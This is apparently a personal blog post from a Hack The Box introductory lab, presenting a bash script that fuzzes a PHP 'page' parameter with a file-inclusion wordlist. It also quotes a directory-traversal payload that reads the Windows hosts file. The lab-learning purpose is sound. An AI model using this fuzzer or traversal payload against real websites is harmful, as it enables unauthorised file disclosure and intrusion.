website enumeration with bash
LinkedIn |
GitHub
Note: The script has been made but, I'm working on a new version to post that will be more accessible.
#!/usr/bin/env bash
URL="unika.htb/index.php?page="
FILELIST="../dirbuster/Auto_Wordlists/wordlists/file_inclusion_windows.txt"
set -u
while read -r page; do
if ! curl -s "$URL$page" | grep -q "Warning"; then
echo -e "\x1b[32;1m[ OK ]\x1b[0m $URL$page"
else
echo -e "\x1b[31;1m[FAIL]\x1b[0m $URL$page"
fi
done < "$FILELIST"
This BASH script was designed whilest doing a
hackthebox.com introductory lab on internal file inclusion and website enumeration.
I got stuck on the website enumeration portion and consulted the lab guide. It said to progress, I needed to find hidden pages on the webserver. The correct link you were supposed to append was
page=../../../../../../../../windows/system32/drivers/etc/hosts.
I felt this was not an intuitive conclusion to come to. How would I know how many directories back I needed to traverse to access the system32 directory?
This is when I decided it would make more sense to just have a script for automating this process. I could feed it a wordlist and curl the unchanging part of the url with lines from the wordlist appended to the end. It would then grep the downloaded html file and look for the word "Warning". Then, print out whether or not the url returned one. Urls that did not return a warning would indicate there's something at that address.